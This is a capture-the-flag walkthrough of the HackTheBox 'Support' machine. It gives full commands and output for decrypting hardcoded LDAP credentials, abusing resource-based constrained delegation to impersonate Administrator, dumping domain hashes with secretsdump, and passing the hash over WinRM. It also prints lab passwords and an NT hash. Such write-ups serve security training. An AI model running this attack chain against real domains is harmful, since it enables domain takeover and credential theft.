Support

Overview

Support is an easy HTB machine created by 0xdf which starts with Reverse Engineering a PE file found in an SMB share to recover encrypted credentials. Then some LDAP enumeration to find a users password in a custom LDAP attribute. For root you exploit RBCD to the DC to impersonate Administrator, then you can dump all of the NT hashes to WinRM for the root flag.

Nmap Scan

I’ll run nmap on all open TCP ports:

💫 ~/htb/Support/enumeration ➜ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV -vvvv 10.10.11.174
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-13 03:41 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:41
Nmap scan report for 10.10.11.174
Host is up, received echo-reply ttl 127 (0.100s latency).
Scanned at 2025-06-13 03:41:34 EDT for 56s

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-13 07:41:36Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 19493/tcp): CLEAN (Timeout)
|   Check 2 (port 32659/tcp): CLEAN (Timeout)
|   Check 3 (port 45724/udp): CLEAN (Timeout)
|   Check 4 (port 40490/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2025-06-13T07:41:45
|_  start_date: N/A
|_clock-skew: -4s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Seems like a domain controller with the domain support.htb. I’ll run nxc to get the FQDN and I’ll add that to my /etc/hosts file:

💫 ~/htb/Support/enumeration ➜ nxc smb 10.10.11.174
SMB         10.10.11.174    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
💫 ~/htb/Support/enumeration ➜ echo '10.10.11.174 DC.support.htb support.htb' >> /etc/hosts
💫 ~/htb/Support/enumeration ➜ nxc smb DC.support.htb
SMB         10.10.11.174    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)

Recon

445/tcp - SMB

One thing I always do is I check for Guest authentication over SMB, in this case it works and I use the Guest account to get a list of SMB shares on the DC:

💫 ~/htb/Support/enumeration ➜ nxc smb DC.support.htb -u Guest -p '' --shares
SMB         10.10.11.174    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.174    445    DC               [+] support.htb\Guest:
SMB         10.10.11.174    445    DC               [*] Enumerated shares
SMB         10.10.11.174    445    DC               Share           Permissions     Remark
SMB         10.10.11.174    445    DC               -----           -----------     ------
SMB         10.10.11.174    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.174    445    DC               C$                              Default share
SMB         10.10.11.174    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.174    445    DC               NETLOGON                        Logon server share
SMB         10.10.11.174    445    DC               support-tools   READ            support staff tools
SMB         10.10.11.174    445    DC               SYSVOL                          Logon server share

Most of these are default, besides support-tools which I have read access over, I’ll connect using impacket’s smbclient.py and I’ll grab whatever is in that share.

💫 ~/htb/Support/enumeration ➜ smbclient.py support.htb/Guest'@'dc.support.htb -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Type help for list of commands
# use support-tools
# ls
drw-rw-rw-          0  Wed Jul 20 13:01:06 2022 .
drw-rw-rw-          0  Sat May 28 07:18:25 2022 ..
-rw-rw-rw-    2880728  Sat May 28 07:19:19 2022 7-ZipPortable_21.07.paf.exe
-rw-rw-rw-    5439245  Sat May 28 07:19:55 2022 npp.8.4.1.portable.x64.zip
-rw-rw-rw-    1273576  Sat May 28 07:20:06 2022 putty.exe
-rw-rw-rw-   48102161  Sat May 28 07:19:31 2022 SysinternalsSuite.zip
-rw-rw-rw-     277499  Wed Jul 20 13:01:07 2022 UserInfo.exe.zip
-rw-rw-rw-      79171  Sat May 28 07:20:17 2022 windirstat1_1_2_setup.exe
-rw-rw-rw-   44398000  Sat May 28 07:19:43 2022 WiresharkPortable64_3.6.5.paf.exe
# get UserInfo.exe.zip
# exit

A lot of these are default executablse such as Wireshark, 7zip, etc. The file UserInfo.exe.zip does not look default.

💫 ~/htb/Support/enumeration ➜ file UserInfo.exe.zip
UserInfo.exe.zip: Zip archive data, made by v2.0 UNIX, extract using at least v2.0, last modified May 27 2022 10:51:04, uncompressed size 12288, method=deflate
💫 ~/htb/Support/enumeration ➜ unzip UserInfo.exe.zip
Archive:  UserInfo.exe.zip
  inflating: UserInfo.exe
  inflating: CommandLineParser.dll
  inflating: Microsoft.Bcl.AsyncInterfaces.dll
  inflating: Microsoft.Extensions.DependencyInjection.Abstractions.dll
  inflating: Microsoft.Extensions.DependencyInjection.dll
  inflating: Microsoft.Extensions.Logging.Abstractions.dll
  inflating: System.Buffers.dll
  inflating: System.Memory.dll
  inflating: System.Numerics.Vectors.dll
  inflating: System.Runtime.CompilerServices.Unsafe.dll
  inflating: System.Threading.Tasks.Extensions.dll
  inflating: UserInfo.exe.config
💫 ~/htb/Support/enumeration ➜ file UserInfo.exe
UserInfo.exe: PE32 executable for MS Windows 6.00 (console), Intel i386 Mono/.Net assembly, 3 sections

Auth as ldap

This is a PE32 executable for Windows, I can reverse engineer this using dnSpy

Seems like this is a tool for querying user information through LDAP, which by default requires credentials. So usually when reverse engineering a PE like this, I’m looking for what credentials it authenticates to LDAP with.

This function is responsible for encrypting the LDAP credentials, it encrypts the password as:

0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E

Using this key:

armando

We can use this simple Python 3 script from ChatGPT to decrypt these credentials:

import base64

def decrypt_password():
    enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
    key = b"armando"
    xor_pad = 223

    # Step 1: Base64 decode
    encrypted_bytes = base64.b64decode(enc_password)

    # Step 2: XOR decrypt
    decrypted_bytes = bytearray()
    for i in range(len(encrypted_bytes)):
        decrypted_byte = encrypted_bytes[i] ^ key[i % len(key)] ^ xor_pad
        decrypted_bytes.append(decrypted_byte)

    # Step 3: Convert to string using latin-1 (or try utf-8 if unsure)
    return decrypted_bytes.decode('latin-1')

# Run it
if __name__ == "__main__":
    password = decrypt_password()
    print("[+] Decrypted password:", password)

This script is able to decrypt the credentials:

💫 ~/htb/Support/enumeration ➜ python3 decrypt.py
[+] Decrypted password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

We still don’t know what user this password is for, checking the code again, the function LdapQuery leaks the username in the LDAP url:

So that would mean the credentials are:

ldap \ nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

I’ll test these over LDAP via nxc:

💫 ~/htb/Support/enumeration ➜ nxc ldap DC.support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
LDAP        10.10.11.174    389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
LDAP        10.10.11.174    389    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Auth as support

Using these creds I’ll get a bloodhound dump via bloodhound-python:

💫 ~/htb/Support/enumeration ➜ bloodhound-python -d support.htb -c ObjectProps,Group,LocalADmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --zip -dc DC.support.htb -ns 10.10.11.174
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.support.htb
INFO: User with SID S-1-5-21-1677581083-3380853377-188903654-500 is logged in on dc.support.htb
INFO: Done in 00M 24S
INFO: Compressing output into 20250613035801_bloodhound.zip

I’ll import this into bloodhound, finding shortest paths to Domain Admins:

As you can see, the user Support can PSRemote (WinRM) to the DC. Enumerating this user through bloodhound shows nothing. But we know that we have to target this user, one common misconfiguration is setting the users password as their description in LDAP. I’ll check this via --users in nxc:

LDAP        10.10.11.174    389    DC               support                       2022-05-28 07:12:00 0

No description, instead I’ll use bloodyAD to retrieve all LDAP attributes for this user:

💫 ~/htb/Support/enumeration ➜ bloodyAD --host DC.support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' get object 'support'

distinguishedName: CN=support,CN=Users,DC=support,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 2025-06-12 12:23:06.370774+00:00
badPwdCount: 0
c: US
cn: support
codePage: 0
company: support
countryCode: 0
dSCorePropagationData: 2022-05-28 11:12:01+00:00
info: Ironside47pleasure40Watchful
instanceType: 4
l: Chapel Hill
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-06-12 12:24:05.964550+00:00
lastLogonTimestamp: 2025-06-12 10:49:33.152026+00:00
logonCount: 0
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb; CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
nTSecurityDescriptor: O:S-1-5-<snip>S-1-5-32-544)
name: support
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
objectClass: top; person; organizationalPerson; user
objectGUID: 3139a30a-31fa-4530-9ea4-8053b396a7f1
objectSid: S-1-5-21-1677581083-3380853377-188903654-1105
postalCode: 27514
primaryGroupID: 513
pwdLastSet: 2022-05-28 11:12:00.977708+00:00
sAMAccountName: support
sAMAccountType: 805306368
st: NC
streetAddress: Skipper Bowles Dr
uSNChanged: 86106
uSNCreated: 12617
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
whenChanged: 2025-06-12 10:49:33+00:00
whenCreated: 2022-05-28 11:12:00+00:00

Ah there it is:

info: Ironside47pleasure40Watchful

A custom attribute that bloodhound wouldn’t render in the GUI. I’ll attempt to now WinRM to the DC using the newfound creds:

💫 ~/htb/Support/enumeration ➜ evil-winrm -i DC.support.htb -u support -p 'Ironside47pleasure40Watchful'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support

And with that, I can grab user.txt:

*Evil-WinRM* PS C:\Users\support\Desktop> ls


    Directory: C:\Users\support\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         6/12/2025   3:02 AM             34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop> cat user.txt
a5ba0d8<snip>

Auth as Administrator

This user has no interesting privileges when running whoami /priv:

*Evil-WinRM* PS C:\Users\support\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

So instead I’ll look at what they have in bloodhound:

Support has GenericAll to the DC, the most common way to exploit this is RBCD (Resource Based Constrained Delegation). This attack has a prerequisite:

• Attacker must have control over an account that has a samAccountName that ends in $ (like a computer account)

So to do this we need to add a new computer account, by default Domain Users can add up to 10 before their Machine Account Quota (MAQ) is exceeded. I can check this via -M maq in nxc:

💫 ~/htb/Support/enumeration ➜ nxc ldap DC.support.htb -u support -p 'Ironside47pleasure40Watchful' -M maq
LDAP        10.10.11.174    389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
LDAP        10.10.11.174    389    DC               [+] support.htb\support:Ironside47pleasure40Watchful
MAQ         10.10.11.174    389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.11.174    389    DC               MachineAccountQuota: 10

The MAQ is 10, this means we can exploit this RBCD without any trouble. First I’ll add a new computer account named xjr$:

💫 ~/htb/Support/enumeration ➜ addcomputer.py support.htb/support -computer-name 'xjr$' -dc-host DC.support.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Successfully added machine account xjr$ with password VBSYRxfuX0ZxwM6jbXMZsXb1J2YyqL1f

Now I own this computer account:

xjr$ \ VBSYRxfuX0ZxwM6jbXMZsXb1J2YyqL1f

Computer accounts can edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, hence why we don’t need a GenericWrite over the computer account to do that in the first place. To abuse the RBCD fully, I’ll use impacket’s rbcd.py:

💫 ~/htb/Support/enumeration ➜ rbcd.py -delegate-from 'xjr$' -delegate-to 'DC$' -dc-ip '10.10.11.174' -action 'write' 'support.htb'/'support'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] No credentials supplied, supply password
Password:
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] xjr$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     xjr$         (S-1-5-21-1677581083-3380853377-188903654-5601)

Cool, now we can get a service ticket for cifs impersonating Administrator:

💫 ~/htb/Support/enumeration ➜ getST.py -spn "cifs/DC.support.htb" -impersonate 'Administrator' "support.htb/xjr$"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

Awesome, using that TGT I can use secretsdump.py to dump all of the NTLM hashes on the DC:

💫 ~/htb/Support/enumeration ➜ secretsdump.py support.htb/Administrator'@'dc.support.htb -k -no-pass -dc-ip 10.10.11.174
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf678b2597ade18d88784ee424ddc0d1a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
<snip>

Now I can use that NT hash to WinRM to the DC:

💫 ~/htb/Support/enumeration ➜ evil-winrm -i DC.support.htb -u Administrator -H 'bb06cbc02b39abeddd1335bc30b19e26'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
support\administrator

And I can use that to read root.txt:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         6/12/2025   3:02 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
c75dfc7729dbf<snip>

Thoughts

Support was a great machine to show beginners how to RE an executable to crack encrypted credentials. I also liked the fact that the users password was in a custom LDAP attribute, makes people have to dig further to get the creds. Root was cool, I like how 0xdf made the root path RBCD instead of something easy. Overall I’d give this box a solid 8/10.